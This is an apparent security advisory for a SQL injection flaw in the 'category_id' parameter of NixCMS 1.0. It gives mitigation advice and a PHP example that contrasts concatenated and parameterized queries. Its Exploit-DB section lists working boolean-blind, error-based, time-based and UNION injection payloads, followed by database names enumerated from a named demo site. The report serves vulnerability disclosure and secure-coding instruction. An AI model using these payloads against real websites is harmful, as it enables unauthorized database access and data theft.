Vendor: NixCMS
By: Bora Bozdogan
CVSS: 7.5 HIGH
CWE: 89 (SQL Injection)
Product Name: NixCMS
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:nixdesign:nixcms:1.0
Metasploit:
Other Scripts:
Platforms Tested: WiN10_X64
2018

NixCMS 1.0 – ‘category_id’ SQL Injection

NixCMS 1.0 is vulnerable to SQL injection in the 'category_id' parameter. The flaw allows an attacker to manipulate the SQL query and execute arbitrary SQL commands. This can lead to unauthorized access, data leakage, or even complete system compromise.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in SQL queries. Use prepared statements or parameterized queries to prevent SQL injection attacks. Apply regular security updates and patches from the vendor.
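
The mitigation above, shown as an added PHP example (not NixCMS code and not part of the original report): a concatenated query beside a validated, parameterized one. The articles table, its columns and both function names are hypothetical, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
declare(strict_types=1);
// Added example: schema and function names are hypothetical, not NixCMS's own.
// SQLite in memory replaces MySQL so this runs without a server.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE articles (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)');
$pdo->exec("INSERT INTO articles (category_id, title) VALUES (24, 'News'), (25, 'Internal')");

// Vulnerable pattern: the request value is concatenated into the SQL text,
// so a quote inside category_id changes the structure of the query.
function articlesUnsafe(PDO $pdo, string $categoryId): array
{
    $sql = "SELECT title FROM articles WHERE category_id = '" . $categoryId . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened pattern: accept only a positive integer, then bind it as a parameter.
// The bound value travels as data and is never parsed as SQL.
// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false for server-side binding.
function articlesSafe(PDO $pdo, string $categoryId): array
{
    $id = filter_var($categoryId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // reject anything that is not a plain integer id
    }
    $stmt = $pdo->prepare('SELECT title FROM articles WHERE category_id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed inputs: a normal id and the boolean-based probe quoted in the report.
$inputs = ['24', "24' AND 1662=1662 AND 'ZFBe'='ZFBe"];
foreach ($inputs as $in) {
    printf(
        "%-40s unsafe=%s safe=%s\n",
        $in,
        json_encode(articlesUnsafe($pdo, $in)),
        json_encode(articlesSafe($pdo, $in))
    );
}
```

The unsafe function returns rows for the probe string because the appended condition is executed as SQL; the safe function rejects it at validation and would treat it as a literal value even if validation were skipped.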

Exploit-DB raw data:

# #
# Exploit Title: NixCMS 1.0 - 'category_id' SQL Injection
# Dork: N/A
# Date: 03.02.2018
# Vendor: https://www.nixdesign.de
# Software Link: https://www.nixdesign.de/nix-cms/
# Demo: http://www.jamaram.de/
# Version: 1.0
# Tested on: WiN10_X64
# Exploit Author: Bora Bozdogan
# Author WebSite : http://borabozdogan.net.tr
# Author E-mail : borayazilim45@mit.tc
# Author Skype : borayazilim45
# # 
# POC:
# 
# http://localhost/[PATH]/single.php?category_id=[SQL]
# 
# Parameter: category_id (GET)
# Type: boolean-based blind
# Title: AND boolean-based blind - WHERE or HAVING clause
# Payload: category_id=24' AND 1662=1662 AND 'ZFBe'='ZFBe
#
# Type: error-based
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
# Payload: category_id=24' AND (SELECT 3422 FROM(SELECT COUNT(*),CONCAT(0x71706a7171,(SELECT (ELT(3422=3422,1))),0x717a627071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CjtO'='CjtO
#
# Type: AND/OR time-based blind
# Title: MySQL >= 5.0.12 AND time-based blind
#
# Payload: category_id=24' AND SLEEP(5) AND 'kjea'='kjea
#
# Type: UNION query
# Title: Generic UNION query (NULL) - 15 columns
# Payload: category_id=24' UNION ALL SELECT NULL,CONCAT(0x71706a7171,0x6953455a5149636b5844654f6f6d4e74506c6b73465572725544644e584158745065566267437574,0x717a627071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- wFQF
#
# #

available databases [3]:
[*] information_schema
[*] usr_web24_1
[*] web24_4